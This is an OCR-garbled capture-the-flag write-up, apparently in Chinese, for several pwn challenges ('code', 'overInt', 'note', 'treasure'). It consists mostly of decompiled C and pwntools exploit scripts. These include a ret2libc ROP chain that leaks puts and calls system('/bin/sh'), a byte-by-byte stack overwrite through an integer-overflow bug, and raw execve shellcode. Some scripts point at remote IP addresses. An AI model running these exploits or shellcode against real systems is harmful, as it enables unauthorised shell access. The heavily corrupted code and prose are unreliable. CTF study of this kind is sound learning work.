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o
3| setbuf(stdin, @LL);
setbuf(stdout, @LL);
while ( 1 )

while ( 1 )
{
3 puts("Please input your name:");
_is0c99 scanf("%s", str);
if ( check_str()} )
break;
puts("Wrong Input™);

}

if ( angr_hash() == 22493966389LL )
break;

puts("Try Again™);

I puts("Welcome™);
have_fun();
return 8;

hash%ﬁ& (By: Apengyfﬁ@) :

itertools
t c
X product( ' abc jklmnopgrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ * ,
7z

p
KeyboardInterrupt
PS D:\work> & C:/Python27/python.exe d:/
(I'Lulj Iyl, IE.IJ ITI, ISI)
22493966389
PS D:\work> []
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int have_fun()
21
char buf; // [rsp+Bh] [rbp-7@h]

int v2; // [rsp+6eh] [rbp-18h]

memset (&buf, @, @xeBuLL);

v2 = 8;

puts("Please input your code to save™);
read (@, &buf, @x18eull);

return puts(“Save Success");
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X B E, #H ret/s, “pop rdi ret” AkiE Hcall.
1.leak_libc Eputsfiigot.pltZ F puts 2 ki H

2.+ E Mm%, 18 EsystemFlF4F & /bin/sh

3.7 Hsystem.

from pwn import *
context.log_level="debug"

p=process("./code")

#p=remote("58.20.46.147",38120)
libc=ELF("./libc.so.6")

#libc=ELF("/1libc/xitong.so")

p.recv()

p.sendline("wyBTs")

p.recvuntil("to save")
payload="a"*(7*16+8)+p64(0x0000000000400983 ) +p64 (0Xx0000000000601018)+p64 (0x0A0P000000400570 ) +p64 (OX00000000
p.sendline(payload)

restr=p.recvuntil("Please")

print "zhukai"+restr

restr=restr[14:20]+"\x00\x00"

print restr

int_1=u64(restr)

print hex(int_1)
libc_base_addr=int_1-1libc.symbols["puts"]
system_addr=1ibc_base_addr+libc.symbols["system"]
binsh_addr=1ibc_base_addr+next(libc.search("/bin/sh"))
print hex(system_addr)

print hex(binsh_addr)
payload="a"*(7*16+8)+p64(0x0000000000400983)+p64(binsh_addr)+p64(system_addr)+p64(system_addr)
p.sendline(payload)

p.interactive()

overint
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int v21; // [rsp+38h] [rbp-8h]
int i3 // [rsp+3ch] [rbp-4h]

V2l = 4;

v2e = 8;

v19 = 8;

w17 = Bx28633372;
va o= "a';

vie = 'b';
vll = 'c’;
viz = 'd';
vli = ‘e’;
buf = &vle;
v18 = *&vle;
alarm(@x78u);

setbuf (stdout, @LL);

puts("Please set arrary number: ");
v2@ = read(®, buf, v21};
printf("len is ¥d\n", v2@);

if ( v2e != v21 )

puts("the x length should be 4 Bytes!™);
exit(@);

v18 = *buf;

v19 = sub_4pe7D1(&v2, 5);

if ( v19 != 35 )

1
puts("You get the wrong key!™);
exit(@);

v3 = sub_4886C6(v21);
if ( w3 == w17 )

1

v13 += vl7;

if ( viE » 4)

printf("nol!™, SLL);

}

else

{
vE = 8;
puts("How many positions you want to modify?™);
vd = BvB;

v28 = read(@, &3, v21);
if ( v28 == v21 )

for ( i =@; 1 < vi; ++1 )
{
vi5 = 8;
vid = @
v7 o= 8;
ve = 8;
puts("wWhich positieon you want to modify?");
v1l5 = read(@, &7, v21};
puts("wWhat content you want to write in2?");
vd = 8&vEj;
vl4 = read(@, &5, lull);
if ( wls == v21 && v14 == )
{
*(&v9 + v7) = v6;
vd = vbj;
printf("str_pos is ¥chn", v4};

El

b

printf({"hella!™, wv4);



}

return @LL;

sub_4007D1: BAVEH—T, &EEH3550K.
sub_4006C6: —&in, XEMILTEHEH (OXFFH)

for i in range(26):
p.sendline("\xff\xff\xff")
p.recv()

print "ks"

p.send("\x8C\x33\x63\02")

p.recv()

#IXPEA] LL{fv3=0x20633372, FHATHERKRE.

- -y
puts("which pesition you want to modify?");
v15 = read(@, &7, v2l);

puts("wWhat content you want to write in?");
vd = &vEj;

v14 = read(@, &v5, 1lulLl);

if (w15 == v21 8& vi4 == 1)

printf("str_pos is %c\n", v4);

XERRERMIE (W) 5.

from pwn import *

import binascii

context.log_level="debug"

#p=process("./overInt")

#58.20.46.149:35533
p=remote("58.20.46.148",35272)

#58.20.46.150:41314

elf=ELF("./overInt")
libc=ELF("/1ibc/1ibc6_2.23-0Qubuntul®_amd64.so")
p.recv()

p.send("!!1$t")

p.recv()

#raw_input()
p.sendline("\x1c\x00\x00\x00")
p.recv()

for i in range(26):
p.sendline("\xff\xff\xff")
p.recv()

print "ks"
p.send("\x8C\x33\x63\02")
p.recv()

p.send("\x20\x00\x00\x00")
p.recvuntil("modify?\n")

p.send("\x38\x00\x00\x00")
p.recvuntil("write in?\n")
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.send("\x13")
.recvuntil("modify?\n")
.send("\x39\x00\x00\x00")
.recvuntil("write in?\n")
.send("\xeb")
.recvuntil("modify?\n")
.send("\x3a\x00\x00\x00")
.recvuntil("write in?\n")
.send("\x40")
.recvuntil("modify?\n")
.send("\x3b\x00\x00\x00")
.recvuntil("write in?\n")
.send("\x00")
.recvuntil("modify?\n")
.send("\x3c\x00\x00\x00")
.recvuntil("write in?\n")
.send("\x00")
.recvuntil("modify?\n")
.send("\x3d\x00\x00\x00")
.recvuntil("write in?\n")
.send("\x00")
.recvuntil("modify?\n")
.send("\x3e\x00\x00\x00")
.recvuntil("write in?\n")
.send("\xe0")
.recvuntil("modify?\n")
.send("\x3f\x00\x00\x00")
.recvuntil("write in?\n")
.send("\xe0")
.recvuntil("modify?\n")
.send("\x40\x00\x00\x00")
.recv()
.send("\x18")#gaiguo
.recvuntil("modify?\n")
.send("\x41\x00\x00\x00")
.recv()

.send("\x20")
.recvuntil("modify?\n")
.send("\x42\x00\x00\x00")
.recv()

.send("\x60")
.recvuntil("modify?\n")
.send("\x43\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x44\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x45\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x46\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x47\x00\x00\x00")
.recv()



p.send("\xe0")
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.recv()

.send("\x48\x00\x00\x00")
.recv()

.send("\x70")
.recvuntil("modify?\n")
.send("\x49\x00\x00\x00")
.recv()

.send("\x05")
.recvuntil("modify?\n")
.send("\x4a\x00\x00\x00")
.recv()

.send("\x40")
.recvuntil("modify?\n")
.send("\x4b\x00\x00\x00" )
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x4c\x00\x00\x00")
.recv()

.send("\xe0")
.recvuntil("modify?\n")
.send("\x4d\x00\x00\x00")
.recv()

.send("\xe0")
.recvuntil("modify?\n")
.send("\x4e\x00\x00\x00")
.recv()

.send("\xe0")
.recvuntil("modify?\n")
.send("\x4f\x00\x00\x00")
.recv()

.send("\x@0")

.send("\x50\x00\x00\x00")
.recv()

.send("\x7f")
.recvuntil("modify?\n")
.send("\x51\x00\x00\x00")
.recv()

.send("\x08")
.recvuntil("modify?\n")
.send("\x52\x00\x00\x00")
.recv()

.send("\x40")
.recvuntil("modify?\n")
.send("\x53\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x54\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x55\x00\x00\x00")
.recv()

.send("\x00")



p.recvuntil("modify?\n")
p.send("\x56\x00\x00\x00")
p.recv()

p.send("\xe0")
p.recvuntil("modify?\n")
#000000000040087F
p.send("\x57\x00\x00\x00")
p.recv()

p.send("\xe0")

restr=p.recv()[19:25]
restr=restr+"\x00\x00"

#print binascii.b2a_hex(restr)
puts_got_addr=u64(restr)

print hex(puts_got_addr)

system_addr=puts_got_addr-1libc.symbols["puts"]+libc.symbols["system"]
binsh_addr=puts_got_addr-1libc.symbols["puts"J+next(libc.search("/bin/sh"))
print hex(system_addr)

str2=hex(system_addr)[2:]
stri=hex(binsh_addr)[2:]

#print "bin"+strl

#print (str2)

raw_input()

#chr(int(stri[10:12],16))
p.send("!1$t")

p.recv()

#raw_input()
p.sendline("\x1c\x00\x00\x00")
p.recv()

for i in range(26):
p.sendline("\xff\xff\xff")
p.recv()

print "ks"
p.send("\x8C\x33\x63\02")
p.recv()
p.send("\x18\x00\x00\x00")
p.recvuntil("modify?\n")

.send("\x38\x00\x00\x00")
.recv()

.send("\x13")
.recvuntil("modify?\n")
.send("\x39\x00\x00\x00")
.recv()

.send("\xeb")
.recvuntil("modify?\n")
.send("\x3a\x00\x00\x00")
.recv()

.send("\x40")
.recvuntil("modify?\n")
.send("\x3b\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x3c\x00\x00\x00")
.recv()
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.send("\x00")
.recvuntil("modify?\n")
.send("\x3d\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x3e\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x3f\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")

.send("\x40\x00\x00\x00")
.recv()
.send(chr(int(stri[10:12],16)))
.recvuntil("modify?\n")
.send("\x41\x00\x00\x00")
.recv()
.send(chr(int(stri[8:10],16)))
.recvuntil("modify?\n")
.send("\x42\x00\x00\x00")
.recv()
.send(chr(int(stri[6:8],16)))
.recvuntil("modify?\n")
.send("\x43\x00\x00\x00")
.recv()
.send(chr(int(stri[4:6],16)))
.recvuntil("modify?\n")
.send("\x44\x00\x00\x00")
.recv()
.send(chr(int(stri[2:4],16)))
.recvuntil("modify?\n")
.send("\x45\x00\x00\x00")
.recv()
.send(chr(int(stri[0:2],16)))
.recvuntil("modify?\n")
.send("\x46\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x47\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")

.send("\x48\x00\x00\x00")
.recv()
.send(chr(int(str2[10:12],16)))
.recvuntil("modify?\n")
.send("\x49\x00\x00\x00")
.recv()
.send(chr(int(str2[8:10],16)))
.recvuntil("modify?\n")



.send("\x4a\x00\x00\x00")
.recv()
.send(chr(int(str2[6:8],16)))
.recvuntil("modify?\n")
.send("\x4b\x00\x00\x00" )
.recv()
.send(chr(int(str2[4:6],16)))
.recvuntil("modify?\n")
.send("\x4c\x00\x00\x00")
.recv()
.send(chr(int(str2[2:4],16)))
.recvuntil("modify?\n")
.send("\x4d\x00\x00\x00")
.recv()
.send(chr(int(str2[0:2],16)))
.recvuntil("modify?\n")
.send("\x4e\x00\x00\x00")
.recv()

.send("\x00")
.recvuntil("modify?\n")
.send("\x4f\x00\x00\x00")
.recv()

.send("\xe0")

.interactive()
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from pwn import *
context.log level='debug'
p=process('./note")
#tp=remote()

p.recv()

def add(a,b,c):
p.sendline('1")#add
sleep(0.01)
p.sendline(a)#index
sleep(0.01)

p.send(b)#length
sleep(0.01)
p.sendline(c)#context
sleep(0.01)

payloadl="\x48\x31\xff\x57\x57\x5e\x5a\xeb\x17"
payload2="\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\xeb\x14"
payload3="\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

add('e', '13\x00\x00\x00\x00\x00\x00\x00\x00\xf8\xff\xff\xff\x00",payloadl)
add("1",'13\n",payload2)
add("2",'13\n",payload3)

p.sendline('5")
p.interactive()

treasure

from pwn import *

context.log level="debug"

p=process('./treasure")

#p=remote("58.20.46.149",44323)

#.149:44323

p.recv()

p.sendline("1")

p.recv()

raw_input()
payload="\x33\xc0\x52\x5e\x8b\xd1\x0f\x05\x90"#{f Fsyscall=read (0,,)
shellcode=payload+"\x90\x90\x90\x90\x90\x90\x90\x90\x90"+" \x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\
p.sendline(shellcode)

p.sendline("1s")

p.interactive()
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